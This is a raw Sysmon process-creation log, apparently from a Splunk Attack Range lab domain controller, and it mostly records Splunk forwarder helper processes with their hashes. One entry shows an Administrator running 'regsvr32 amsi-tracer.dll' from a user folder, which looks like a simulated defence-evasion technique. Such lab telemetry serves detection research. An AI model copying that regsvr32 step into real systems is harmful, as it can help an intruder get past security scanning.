AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031266Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:18.519{A8622C2F-4896-6078-2606-00000000AE01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:17.841{A8622C2F-4895-6078-2506-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:17.170{A8622C2F-4895-6078-2406-00000000AE01}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000031103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:11.414{A8622C2F-488F-6078-2106-00000000AE01}3648C:\Windows\ImmersiveControlPanel\SystemSettings.exe10.0.14393.82 (rs1_release.160805-1735)SettingsMicrosoft® Windows® Operating SystemMicrosoft CorporationSystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanelC:\Windows\ImmersiveControlPanel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A91F621A8A0DE91FAE53D3051303809B,SHA256=E768FF1F2F31178FE5930F261ACD4B19464ACC019FB0AA697D0B48686E59050C,IMPHASH=1812A9B9265AD93B24FA9FCBFAFBC4A6{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000031084Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:07:11.210{A8622C2F-488F-6078-2006-00000000AE01}4896C:\Windows\System32\ApplicationFrameHost.exe10.0.14393.4169 (rs1_release.210107-1130)Application Frame HostMicrosoft® Windows® Operating SystemMicrosoft CorporationApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6F27A494DEAC85725B87BFBC0656A382,SHA256=B93BBD0B6FC7678FD815CC1DAA538F3923C144776CB7C419BC44AF40963E9E89,IMPHASH=3F27A5C187DCE51FC872862DA48D5BCF{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000030888Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:27.822{A8622C2F-4863-6078-1E06-00000000AE01}3472C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEregsvr32 amsi-tracer.dllC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{A8622C2F-46DA-6078-E505-00000000AE01}6008C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /K "doskey git=^"C:\Program Files\Git\cmd\git.exe^" $*" 154100x800000000000000030874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:23.186{A8622C2F-485F-6078-1D06-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030861Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:21.652{A8622C2F-485D-6078-1C06-00000000AE01}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030850Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:21.063{A8622C2F-485D-6078-1B06-00000000AE01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030840Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:20.334{A8622C2F-485C-6078-1A06-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030820Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:18.472{A8622C2F-485A-6078-1906-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:17.792{A8622C2F-4859-6078-1806-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030798Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:06:17.156{A8622C2F-4859-6078-1706-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030667Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:23.169{A8622C2F-4823-6078-1606-00000000AE01}5848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030657Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:21.618{A8622C2F-4821-6078-1506-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030645Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:21.090{A8622C2F-4821-6078-1406-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030636Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:20.328{A8622C2F-4820-6078-1306-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:18.576{A8622C2F-481E-6078-1206-00000000AE01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:17.910{A8622C2F-481D-6078-1106-00000000AE01}3504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:05:17.138{A8622C2F-481D-6078-1006-00000000AE01}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:23.173{A8622C2F-47E7-6078-0F06-00000000AE01}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:21.737{A8622C2F-47E5-6078-0E06-00000000AE01}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030503Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:21.077{A8622C2F-47E5-6078-0D06-00000000AE01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:20.313{A8622C2F-47E4-6078-0C06-00000000AE01}6336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:18.489{A8622C2F-47E2-6078-0B06-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030473Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:17.895{A8622C2F-47E1-6078-0A06-00000000AE01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:04:17.132{A8622C2F-47E1-6078-0906-00000000AE01}3012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:23.315{A8622C2F-47AB-6078-0806-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:21.641{A8622C2F-47A9-6078-0706-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030316Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:21.083{A8622C2F-47A9-6078-0606-00000000AE01}5844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:20.303{A8622C2F-47A8-6078-0506-00000000AE01}5440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:18.556{A8622C2F-47A6-6078-0406-00000000AE01}5568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000030275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:03:17.888{A8622C2F-47A5-6078-0306-00000000AE01}5184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 